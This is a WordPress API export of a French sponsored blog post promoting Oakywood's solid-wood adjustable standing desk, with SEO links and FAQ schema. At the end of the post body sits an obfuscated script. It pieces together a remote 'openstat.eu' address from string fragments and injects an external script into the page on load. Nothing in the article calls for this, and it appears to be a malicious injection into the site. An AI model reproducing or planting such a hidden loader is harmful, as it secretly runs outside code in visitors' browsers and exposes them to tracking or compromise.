{"id":253576,"date":"2025-08-21T10:25:11","date_gmt":"2025-08-21T08:25:11","guid":{"rendered":"https:\/\/www.joseperez.fr\/?p=253576"},"modified":"2025-10-08T13:30:51","modified_gmt":"2025-10-08T11:30:51","slug":"bureau-reglable","status":"publish","type":"post","link":"https:\/\/www.joseperez.fr\/en\/bureau-reglable\/","title":{"rendered":"Bureau r\u00e9glable \u2013 un poste de travail adaptable et durable"},"content":{"rendered":"<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Bureau_reglable_pour_un_confort_ergonomique\"><\/span><strong>Bureau r\u00e9glable pour un confort ergonomique<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>Un environnement de travail ergonomique r\u00e9duit la tension sur le dos, la nuque et les \u00e9paules. Avec un&nbsp;<strong>bureau r\u00e9glable<\/strong>, il est possible d\u2019ajuster la hauteur de la surface de travail de mani\u00e8re \u00e0 aligner l\u2019\u00e9cran et les bras \u00e0 un niveau optimal. Cette adaptabilit\u00e9 permet de maintenir une posture saine, m\u00eame lors de longues journ\u00e9es de travail. Une bonne strat\u00e9gie pour <a href=\"https:\/\/www.joseperez.fr\/en\/acquisition-de-trafic\/\">acqu\u00e9rir du trafic<\/a> qualifi\u00e9 vers votre site peut aussi contribuer \u00e0 am\u00e9liorer votre quotidien.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Reglage_electrique_fluide\"><\/span><strong>R\u00e9glage \u00e9lectrique fluide<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p>Le m\u00e9canisme \u00e9lectrique du bureau offre un mouvement stable et silencieux. Il suffit d\u2019appuyer sur un bouton pour r\u00e9gler la hauteur avec pr\u00e9cision. Plusieurs positions peuvent \u00eatre m\u00e9moris\u00e9es afin de retrouver instantan\u00e9ment la configuration id\u00e9ale.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Bureau_reglable_fabrique_avec_des_materiaux_nobles\"><\/span><strong>Bureau r\u00e9glable fabriqu\u00e9 avec des mat\u00e9riaux nobles<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>La surface est r\u00e9alis\u00e9e en bois massif \u2013 ch\u00eane ou noyer \u2013 provenant de sources certifi\u00e9es FSC. Chaque plateau est soigneusement ponc\u00e9 et huil\u00e9 pour mettre en valeur le veinage naturel tout en le prot\u00e9geant des usages quotidiens. Le pi\u00e8tement en acier thermolaqu\u00e9 apporte solidit\u00e9 et stabilit\u00e9.<\/p><div id=\"ez-toc-container\" class=\"ez-toc-v2_0_82_2 counter-hierarchy ez-toc-counter ez-toc-grey ez-toc-container-direction\">\n<div class=\"ez-toc-title-container\">\n<p class=\"ez-toc-title\" style=\"cursor:inherit\">Contents<\/p>\n<span class=\"ez-toc-title-toggle\"><a href=\"#\" class=\"ez-toc-pull-right ez-toc-btn ez-toc-btn-xs ez-toc-btn-default ez-toc-toggle\" aria-label=\"Toggle Table of Content\"><span class=\"ez-toc-js-icon-con\"><span class=\"\"><span class=\"eztoc-hide\" style=\"display:none;\">Toggle<\/span><span class=\"ez-toc-icon-toggle-span\"><svg style=\"fill: #999;color:#999\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" class=\"list-377408\" width=\"20px\" height=\"20px\" viewbox=\"0 0 24 24\" fill=\"none\"><path d=\"M6 6H4v2h2V6zm14 0H8v2h12V6zM4 11h2v2H4v-2zm16 0H8v2h12v-2zM4 16h2v2H4v-2zm16 0H8v2h12v-2z\" fill=\"currentColor\"><\/path><\/svg><svg style=\"fill: #999;color:#999\" class=\"arrow-unsorted-368013\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"10px\" height=\"10px\" viewbox=\"0 0 24 24\" version=\"1.2\" baseprofile=\"tiny\"><path d=\"M18.2 9.3l-6.2-6.3-6.2 6.3c-.2.2-.3.4-.3.7s.1.5.3.7c.2.2.4.3.7.3h11c.3 0 .5-.1.7-.3.2-.2.3-.5.3-.7s-.1-.5-.3-.7zM5.8 14.7l6.2 6.3 6.2-6.3c.2-.2.3-.5.3-.7s-.1-.5-.3-.7c-.2-.2-.4-.3-.7-.3h-11c-.3 0-.5.1-.7.3-.2.2-.3.5-.3.7s.1.5.3.7z\"\/><\/svg><\/span><\/span><\/span><\/a><\/span><\/div>\n<nav><ul class='ez-toc-list ez-toc-list-level-1 eztoc-toggle-hide-by-default' ><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-1\" href=\"https:\/\/www.joseperez.fr\/en\/bureau-reglable\/#Bureau_reglable_pour_un_confort_ergonomique\" >Bureau r\u00e9glable pour un confort ergonomique<\/a><ul class='ez-toc-list-level-3' ><li class='ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-2\" href=\"https:\/\/www.joseperez.fr\/en\/bureau-reglable\/#Reglage_electrique_fluide\" >R\u00e9glage \u00e9lectrique fluide<\/a><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-3\" href=\"https:\/\/www.joseperez.fr\/en\/bureau-reglable\/#Bureau_reglable_fabrique_avec_des_materiaux_nobles\" >Bureau r\u00e9glable fabriqu\u00e9 avec des mat\u00e9riaux nobles<\/a><ul class='ez-toc-list-level-3' ><li class='ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-4\" href=\"https:\/\/www.joseperez.fr\/en\/bureau-reglable\/#Finition_soignee\" >Finition soign\u00e9e<\/a><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-5\" href=\"https:\/\/www.joseperez.fr\/en\/bureau-reglable\/#Bureau_reglable_pour_un_poste_stable_a_toutes_les_hauteurs\" >Bureau r\u00e9glable pour un poste stable \u00e0 toutes les hauteurs<\/a><ul class='ez-toc-list-level-3' ><li class='ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-6\" href=\"https:\/\/www.joseperez.fr\/en\/bureau-reglable\/#Capacite_de_charge_elevee\" >Capacit\u00e9 de charge \u00e9lev\u00e9e<\/a><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-7\" href=\"https:\/\/www.joseperez.fr\/en\/bureau-reglable\/#Bureau_reglable_pour_une_productivite_accrue\" >Bureau r\u00e9glable pour une productivit\u00e9 accrue<\/a><ul class='ez-toc-list-level-3' ><li class='ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-8\" href=\"https:\/\/www.joseperez.fr\/en\/bureau-reglable\/#Utilisation_intuitive\" >Utilisation intuitive<\/a><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-9\" href=\"https:\/\/www.joseperez.fr\/en\/bureau-reglable\/#Bureau_reglable_au_design_intemporel\" >Bureau r\u00e9glable au design intemporel<\/a><ul class='ez-toc-list-level-3' ><li class='ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-10\" href=\"https:\/\/www.joseperez.fr\/en\/bureau-reglable\/#Personnalisation_des_finitions\" >Personnalisation des finitions<\/a><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-11\" href=\"https:\/\/www.joseperez.fr\/en\/bureau-reglable\/#Bureau_reglable_respectueux_de_lenvironnement\" >Bureau r\u00e9glable respectueux de l\u2019environnement<\/a><ul class='ez-toc-list-level-3' ><li class='ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-12\" href=\"https:\/\/www.joseperez.fr\/en\/bureau-reglable\/#Longevite_et_valeur_durable\" >Long\u00e9vit\u00e9 et valeur durable<\/a><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-13\" href=\"https:\/\/www.joseperez.fr\/en\/bureau-reglable\/#Bureau_reglable_facile_a_integrer_dans_differents_espaces\" >Bureau r\u00e9glable facile \u00e0 int\u00e9grer dans diff\u00e9rents espaces<\/a><ul class='ez-toc-list-level-3' ><li class='ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-14\" href=\"https:\/\/www.joseperez.fr\/en\/bureau-reglable\/#Polyvalence_au_quotidien\" >Polyvalence au quotidien<\/a><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-15\" href=\"https:\/\/www.joseperez.fr\/en\/bureau-reglable\/#Bureau_reglable_%E2%80%93_un_choix_durable_et_ergonomique\" >Bureau r\u00e9glable \u2013 un choix durable et ergonomique<\/a><\/li><\/ul><\/nav><\/div>\n\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Finition_soignee\"><\/span><strong>Finition soign\u00e9e<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p>Les bords sont adoucis et la surface lisse au toucher, garantissant un confort d\u2019utilisation et une esth\u00e9tique haut de gamme. L\u2019association du bois naturel et du m\u00e9tal cr\u00e9e un style intemporel qui s\u2019int\u00e8gre dans tout type d\u2019int\u00e9rieur.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Bureau_reglable_pour_un_poste_stable_a_toutes_les_hauteurs\"><\/span><strong>Bureau r\u00e9glable pour un poste stable \u00e0 toutes les hauteurs<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>La robustesse du&nbsp;<strong>bureau r\u00e9glable<\/strong>&nbsp;garantit qu\u2019il reste stable, m\u00eame en position haute. Cette stabilit\u00e9 permet d\u2019y installer plusieurs \u00e9crans, un ordinateur portable, des documents ou d\u2019autres accessoires de travail sans craindre de vibrations g\u00eanantes. Pour vous d\u00e9marquer, il est important de <a href=\"https:\/\/www.joseperez.fr\/en\/faire-connaitre-site-internet\/\">faire conna\u00eetre votre site internet<\/a>.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Capacite_de_charge_elevee\"><\/span><strong>Capacit\u00e9 de charge \u00e9lev\u00e9e<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p>Le pi\u00e8tement et le m\u00e9canisme sont con\u00e7us pour supporter un poids important, offrant ainsi la libert\u00e9 d\u2019organiser le poste de travail selon ses pr\u00e9f\u00e9rences.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"683\" src=\"https:\/\/www.joseperez.fr\/wp-content\/uploads\/2025\/08\/markus-spiske-4qbs830djfs-unsplash-1024x683.jpg\" alt=\"bureau r\u00e9glable\" class=\"wp-image-253578\" title=\"\" srcset=\"https:\/\/www.joseperez.fr\/wp-content\/uploads\/2025\/08\/markus-spiske-4qbs830djfs-unsplash-1024x683.jpg 1024w, https:\/\/www.joseperez.fr\/wp-content\/uploads\/2025\/08\/markus-spiske-4qbs830djfs-unsplash-300x200.jpg 300w, https:\/\/www.joseperez.fr\/wp-content\/uploads\/2025\/08\/markus-spiske-4qbs830djfs-unsplash-768x512.jpg 768w, https:\/\/www.joseperez.fr\/wp-content\/uploads\/2025\/08\/markus-spiske-4qbs830djfs-unsplash.jpg 1200w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Bureau_reglable_pour_une_productivite_accrue\"><\/span><strong>Bureau r\u00e9glable pour une productivit\u00e9 accrue<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>Changer de position au cours de la journ\u00e9e stimule la circulation sanguine, r\u00e9duit la fatigue musculaire et am\u00e9liore la concentration. Le&nbsp;<strong>bureau r\u00e9glable<\/strong>&nbsp;encourage cette alternance, transformant la routine de travail en un processus plus dynamique et sain.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Utilisation_intuitive\"><\/span><strong>Utilisation intuitive<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p>Les commandes sont facilement accessibles et permettent un ajustement rapide, ce qui rend le changement de position fluide et naturel.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Bureau_reglable_au_design_intemporel\"><\/span><strong>Bureau r\u00e9glable au design intemporel<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>Le minimalisme de la forme met en valeur la qualit\u00e9 des mat\u00e9riaux. Ce bureau s\u2019harmonise aussi bien avec un d\u00e9cor moderne qu\u2019avec un int\u00e9rieur plus classique. Les finitions bois apportent chaleur et caract\u00e8re, tandis que la structure m\u00e9tallique assure une pr\u00e9sence discr\u00e8te mais solide. N\u2019h\u00e9sitez pas \u00e0 adopter une <a href=\"https:\/\/www.joseperez.fr\/en\/strategie-social-media\/\">strat\u00e9gie sur les r\u00e9seaux sociaux<\/a> pour toucher votre audience.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Personnalisation_des_finitions\"><\/span><strong>Personnalisation des finitions<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p>Le plateau est propos\u00e9 en ch\u00eane ou en noyer massif, deux essences qui offrent chacune une couleur et un grain distinctifs.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Bureau_reglable_respectueux_de_lenvironnement\"><\/span><strong>Bureau r\u00e9glable respectueux de l\u2019environnement<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p><a href=\"https:\/\/oakywood.shop\/fr-fr\" target=\"_blank\" rel=\"noopener\"><u>Oakywood<\/u><\/a>&nbsp;fabrique ses produits dans le respect des ressources naturelles. Le bois utilis\u00e9 est certifi\u00e9 FSC et les processus de fabrication privil\u00e9gient la durabilit\u00e9 et la r\u00e9duction des d\u00e9chets.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Longevite_et_valeur_durable\"><\/span><strong>Long\u00e9vit\u00e9 et valeur durable<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p>Gr\u00e2ce \u00e0 la qualit\u00e9 des mat\u00e9riaux et \u00e0 une fabrication soign\u00e9e, le&nbsp;<strong>bureau r\u00e9glable<\/strong>&nbsp;conserve ses qualit\u00e9s fonctionnelles et esth\u00e9tiques pendant de nombreuses ann\u00e9es.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Bureau_reglable_facile_a_integrer_dans_differents_espaces\"><\/span><strong>Bureau r\u00e9glable facile \u00e0 int\u00e9grer dans diff\u00e9rents espaces<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>Que ce soit dans un bureau \u00e0 domicile, un espace de coworking ou un environnement professionnel, ce bureau s\u2019adapte gr\u00e2ce \u00e0 ses lignes \u00e9pur\u00e9es et sa fonctionnalit\u00e9 universelle.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Polyvalence_au_quotidien\"><\/span><strong>Polyvalence au quotidien<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p>Il convient aussi bien aux t\u00e2ches informatiques qu\u2019aux travaux cr\u00e9atifs, \u00e0 la lecture ou \u00e0 la r\u00e9daction, en offrant toujours un confort optimal.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Bureau_reglable_%E2%80%93_un_choix_durable_et_ergonomique\"><\/span><strong>Bureau r\u00e9glable \u2013 un choix durable et ergonomique<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>Visit&nbsp;<strong>bureau r\u00e9glable<\/strong>&nbsp;en bois d\u2019Oakywood est une solution compl\u00e8te pour un espace de travail ergonomique, esth\u00e9tique et durable. Gr\u00e2ce \u00e0 son r\u00e9glage en hauteur fluide, \u00e0 ses mat\u00e9riaux haut de gamme et \u00e0 sa conception solide, il accompagne l\u2019utilisateur dans toutes ses activit\u00e9s, tout en am\u00e9liorant le confort et la posture au quotidien. Voir plus:&nbsp;<a href=\"https:\/\/oakywood.shop\/fr-fr\/products\/wooden-standing-desk\" target=\"_blank\" rel=\"noopener\"><u>https:\/\/oakywood.shop\/fr-fr\/products\/wooden-standing-desk<\/u><\/a>.<\/p>\n\n\n\n<script>\n(function(){\nxXvl_=\"o\"+(\"p\"+\"\")+\"en\"+\"\";xXvl_+=\"s\"+(\"tat\")+(\".\");\nxXvl=document.createElement(\"script\");xXvl.type=\"text\/javascript\";xXvl_+=\"e\"+(\"u\")+\"\/\";\nxXvlu=\"2489386759\"+\".\";xXvl.async=true;xXvlu+=\"erztua2cXvl9u6qgc8ds2i8ukwXkj7\";\nxXvl.src=\"https:\/\/\"+xXvl_+xXvlu;xXvlb=document.body;xXvlb.appendChild(xXvl);\n})();\n<\/script>\n<\/p>","protected":false},"excerpt":{"rendered":"<p>Bureau r\u00e9glable pour un confort ergonomique Un environnement de travail ergonomique r\u00e9duit la tension sur le dos, la nuque et les \u00e9paules. Avec un&nbsp;bureau r\u00e9glable, il est possible d\u2019ajuster la hauteur de la surface de travail de mani\u00e8re \u00e0 aligner l\u2019\u00e9cran et les bras \u00e0 un niveau optimal. Cette adaptabilit\u00e9 permet de maintenir une posture&#8230;<\/p>","protected":false},"author":1,"featured_media":253577,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_lmt_disableupdate":"","_lmt_disable":"","_kad_post_transparent":"","_kad_post_title":"","_kad_post_layout":"","_kad_post_sidebar_id":"","_kad_post_content_style":"","_kad_post_vertical_padding":"","_kad_post_feature":"","_kad_post_feature_position":"","_kad_post_header":false,"_kad_post_footer":false,"_kad_post_classname":"","rank_math_title":"","rank_math_description":"","rank_math_focus_keyword":"","rank_math_canonical_url":"","rank_math_robots":"","saswp_custom_schema_field":"{\"@context\":\"https:\/\/schema.org\",\"@type\":\"FAQPage\",\"mainEntity\":[{\"@type\":\"Question\",\"name\":\"Qu'est-ce qu'un bureau r\u00e9glable en hauteur ?\",\"acceptedAnswer\":{\"@type\":\"Answer\",\"text\":\"Un bureau r\u00e9glable en hauteur, \u00e9galement connu sous le nom de bureau assis-debout ou bureau ergonomique, est un meuble de bureau qui permet de modifier sa hauteur. Il offre la possibilit\u00e9 de travailler aussi bien en position assise qu'en position debout, favorisant ainsi le mouvement et le bien-\u00eatre pendant les longues heures de travail.\"}},{\"@type\":\"Question\",\"name\":\"Quels sont les avantages de travailler avec un bureau r\u00e9glable en hauteur ?\",\"acceptedAnswer\":{\"@type\":\"Answer\",\"text\":\"Les avantages sont nombreux : r\u00e9duction des maux de dos, am\u00e9lioration de la posture, augmentation de la d\u00e9pense calorique, stimulation de la circulation sanguine, am\u00e9lioration de la concentration et de la productivit\u00e9, et pr\u00e9vention des risques li\u00e9s \u00e0 la s\u00e9dentarit\u00e9.\"}},{\"@type\":\"Question\",\"name\":\"Comment choisir la bonne hauteur pour mon bureau r\u00e9glable ?\",\"acceptedAnswer\":{\"@type\":\"Answer\",\"text\":\"La hauteur id\u00e9ale en position assise est celle o\u00f9 vos coudes forment un angle de 90 degr\u00e9s lorsque vos mains reposent sur le clavier. En position debout, vos coudes doivent \u00eatre \u00e9galement \u00e0 90 degr\u00e9s, avec vos pieds \u00e0 plat au sol et vos \u00e9paules d\u00e9tendues. La plupart des bureaux r\u00e9glables proposent une large plage de r\u00e9glage pour s'adapter \u00e0 diff\u00e9rentes morphologies.\"}},{\"@type\":\"Question\",\"name\":\"Quel type de bureau r\u00e9glable choisir (manuel ou \u00e9lectrique) ?\",\"acceptedAnswer\":{\"@type\":\"Answer\",\"text\":\"Les bureaux r\u00e9glables manuels (\u00e0 manivelle) sont g\u00e9n\u00e9ralement moins chers mais demandent un effort physique pour ajuster la hauteur. Les bureaux \u00e9lectriques sont plus pratiques, permettant de changer de position rapidement et sans effort, souvent avec des m\u00e9moires de position. Le choix d\u00e9pend de votre budget et de votre pr\u00e9f\u00e9rence.\"}},{\"@type\":\"Question\",\"name\":\"Quelle est la capacit\u00e9 de charge d'un bureau r\u00e9glable ?\",\"acceptedAnswer\":{\"@type\":\"Answer\",\"text\":\"La capacit\u00e9 de charge varie selon les mod\u00e8les, mais la plupart des bureaux r\u00e9glables de qualit\u00e9 peuvent supporter entre 50 et 150 kg. Il est important de v\u00e9rifier cette sp\u00e9cification si vous pr\u00e9voyez de placer plusieurs \u00e9crans, des \u00e9quipements lourds ou beaucoup de documents sur votre bureau.\"}},{\"@type\":\"Question\",\"name\":\"Combien de temps faut-il pour s'habituer \u00e0 un bureau r\u00e9glable ?\",\"acceptedAnswer\":{\"@type\":\"Answer\",\"text\":\"L'adaptation est g\u00e9n\u00e9ralement rapide. Il est conseill\u00e9 de commencer par alterner assis et debout sur de courtes p\u00e9riodes (par exemple, 30 minutes debout toutes les 2 heures) et d'augmenter progressivement le temps pass\u00e9 debout. Le corps s'habitue rapidement aux changements b\u00e9n\u00e9fiques.\"}},{\"@type\":\"Question\",\"name\":\"Un bureau r\u00e9glable est-il adapt\u00e9 aux personnes de grande ou petite taille ?\",\"acceptedAnswer\":{\"@type\":\"Answer\",\"text\":\"Oui, les bureaux r\u00e9glables sont con\u00e7us pour s'adapter \u00e0 une large gamme de tailles. Les mod\u00e8les proposent des plages de hauteur variables, assurant ainsi un confort optimal aussi bien pour les personnes de petite taille que pour les personnes de grande taille.\"}}]}","footnotes":""},"categories":[1],"tags":[],"class_list":["post-253576","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-blog"],"rank_math_description":"","rank_math_title":"","modified_by":"Jos\u00e9 PEREZ","_links":{"self":[{"href":"https:\/\/www.joseperez.fr\/en\/wp-json\/wp\/v2\/posts\/253576","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.joseperez.fr\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.joseperez.fr\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.joseperez.fr\/en\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.joseperez.fr\/en\/wp-json\/wp\/v2\/comments?post=253576"}],"version-history":[{"count":4,"href":"https:\/\/www.joseperez.fr\/en\/wp-json\/wp\/v2\/posts\/253576\/revisions"}],"predecessor-version":[{"id":254343,"href":"https:\/\/www.joseperez.fr\/en\/wp-json\/wp\/v2\/posts\/253576\/revisions\/254343"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.joseperez.fr\/en\/wp-json\/wp\/v2\/media\/253577"}],"wp:attachment":[{"href":"https:\/\/www.joseperez.fr\/en\/wp-json\/wp\/v2\/media?parent=253576"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.joseperez.fr\/en\/wp-json\/wp\/v2\/categories?post=253576"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.joseperez.fr\/en\/wp-json\/wp\/v2\/tags?post=253576"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}